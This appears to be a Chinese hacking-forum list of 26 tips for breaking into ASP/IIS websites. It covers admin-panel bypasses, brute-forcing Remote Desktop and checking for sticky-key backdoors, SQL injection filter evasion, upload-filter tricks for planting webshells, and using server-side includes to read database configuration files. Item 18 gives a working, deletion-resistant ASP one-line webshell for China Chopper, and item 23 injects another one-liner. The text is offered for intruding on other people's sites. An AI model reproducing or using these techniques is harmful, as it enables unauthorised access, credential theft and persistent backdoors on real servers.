1.利用網(wǎng)站過濾不嚴直接繞過后臺驗證,在網(wǎng)站后面加上 admin/session.asp 或 admin/left.asp
2.有的網(wǎng)站進后臺會出現(xiàn)一個腳本提示框,輸入:administrator 即可突破!因為admin代表以管理員身份進入的意思。
3.有的網(wǎng)站開了3389,入侵之前先去連接3389,嘗試弱口令或是爆破,再者就是按5次shift鍵,看看有沒前人裝過后門,然后再社工密碼。
4.有時候進后臺會彈出提示框“請登陸”,把地址抄寫出來(復(fù)制不了),然后放在網(wǎng)頁源代碼分析器里,選擇瀏覽器-攔截跳轉(zhuǎn)勾選–查看即可進入后臺!
5.突破防盜鏈訪問webshell,代碼:JAVAscript:document.write(“<a href=’http://www.xxx.com/uploadfile/1.asp’>fuck</a>”) 回車后點擊GO即可進入webshell
6.突破一流信息監(jiān)控攔截系統(tǒng)訪問,當(dāng)小馬可以訪問,上傳大馬卻不行的時候,可以先用大馬跟一張圖片合并,在上傳合并后的圖片,接著數(shù)據(jù)庫備份后訪問即可!
7.在拿編輯器的shell時,有時增加了asp|asa|cer|php|aspx等擴展名上傳時都被過濾了,其實只要增加aaspsp 上傳asp就會突破了。
8.有時啊D猜出表段了,但是猜不到字段的時候,可以到后臺查看源文件,搜索ID或type,一般都能找到,再到啊D里添加字段進行猜解內(nèi)容即可突破。
9.社工后臺密碼可以用這個技巧,假如網(wǎng)站域名是:www.baidu.com 管理員名稱為admin,可以試試密碼“baidu”和“baidu.com”來登陸。
10.手工注入時如果網(wǎng)站過濾了 and 1=1 and 1=2 ,可以用xor 1=1 xor 1=2 進行判斷。
11.本地構(gòu)造上傳一句話木馬,如果提示“請先選擇你要上傳的文件![ 重新上傳 ]” ,說明文件太小了,用記事本打開再復(fù)制多幾句話從而擴大文件大小,再上傳即可。
12.用啊d跑表,跑字段名name和pass出不來,顯示長度超過50什么的,猜解不出的情況下,這時放在穿山甲去跑一般都能跑出來!
13.猜管理員后臺小技巧,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp 會現(xiàn)出菜單導(dǎo)航,然后迅雷下載全部鏈接。
14.知道表名,字段,使用SQL語句在ACCESS數(shù)據(jù)庫中加個用戶名及密碼語句:Insert into admin(user,pwd) values(‘test’,’test’)
15.當(dāng)獲得管理員密碼,卻拿不到管理員的帳號時,到前臺隨便打開一個新聞,找找諸如“提交者”“發(fā)布者”之類的字眼,一般“提交者”就是管理員的帳號了。
16.爆破ASP+IIS架設(shè)的網(wǎng)站web絕對路徑,假設(shè)網(wǎng)站主頁為:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。
17.源碼的利用,很多網(wǎng)站用的都是網(wǎng)上下載的源碼,有的站長很懶,什么也不改,然后就上傳開通網(wǎng)站了,我們可以去下載一套,里面有很多默認的信息值得利用。
18.把以下代碼上傳到webshell里,后綴是asp,就算別人發(fā)現(xiàn)了也刪除不了,算是超級防刪的一句話木馬了,可以很安全的留個后門,菜刀連接密碼:x
<%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>
19.當(dāng)破解出帳號密碼卻找不到后臺的時候,可以嘗試鏈接ftp,假如域名是:www.baidu.com “ 得到的密碼為“bishi”,我們就可以試下用“xxxx”“xxxx.cn”www.xxxx.cn作為FTP 用戶名,用“bishi”:作為FTP密碼來進行登陸,成功的幾率可以很大的哦!ftp的默認端口:21 默認帳號密碼:test
20.有的后臺不顯示驗證碼,難道就沒法登錄了么? 其實把一段代碼導(dǎo)入注冊表里就可以突破這個困境了,把下面的代碼保存為Code.reg,雙擊導(dǎo)入就可以了!
REGEDIT4
[HKEY_LOCAL_macHINESOFTWAREMicrosoftInternet ExplorerSecurity]
"BlockXBM"=dword:00000000
21.當(dāng)網(wǎng)站不允許上傳 asp、asa、php等文件時,我們可以上傳一個stm文件,代碼為“<!–#include file=”conn.asp”–>”
(想查看什么文件就寫什么文件名,這里我假設(shè)想查看“conn.asp”),然后直接打開這個stm文件的地址,再查看源代碼,“conn.asp”這個文件的代碼就一覽無遺了!
22.當(dāng)網(wǎng)站不允許上傳ASP,CGI,CER,CDX,HTR等類型的文件時,嘗試上傳一個shtm文件,內(nèi)容為:<!–#includ file=”conn.asp”–>
如果上傳成功,那太好了,訪問地址就可以瀏覽conn.asp里的內(nèi)容了,這樣一來,數(shù)據(jù)庫路徑也就到手啦!
23.手工檢測注入點彈出“你的操作已被記錄!”之類的信息,訪問這個文件:sqlin.asp,如果存在,在注入點后面植入一句話木馬:‘excute(request(“TNT”))
接著用一句話木馬客戶端連接:http://www.xxx.com/sqlin.asp,上傳木馬即可拿下shell,因為很多防注入程序都是用”sqlin.asp“這個文件名來做非法記錄的數(shù)據(jù)庫。
24.旁注的話,肯定是挑支持aspx的站點來日了,問題是怎樣判斷呢?方法很簡單,在在網(wǎng)站后面加上xxx.aspx,如果返回“/”應(yīng)用程序中的服務(wù)器錯誤,無法找到該資源,404畫面就說明支持aspx木馬。
25.網(wǎng)站后面加test.php 可以查看版本
26.禁忌這兩個網(wǎng)站后臺文件 admin_index.asp manage_login.asp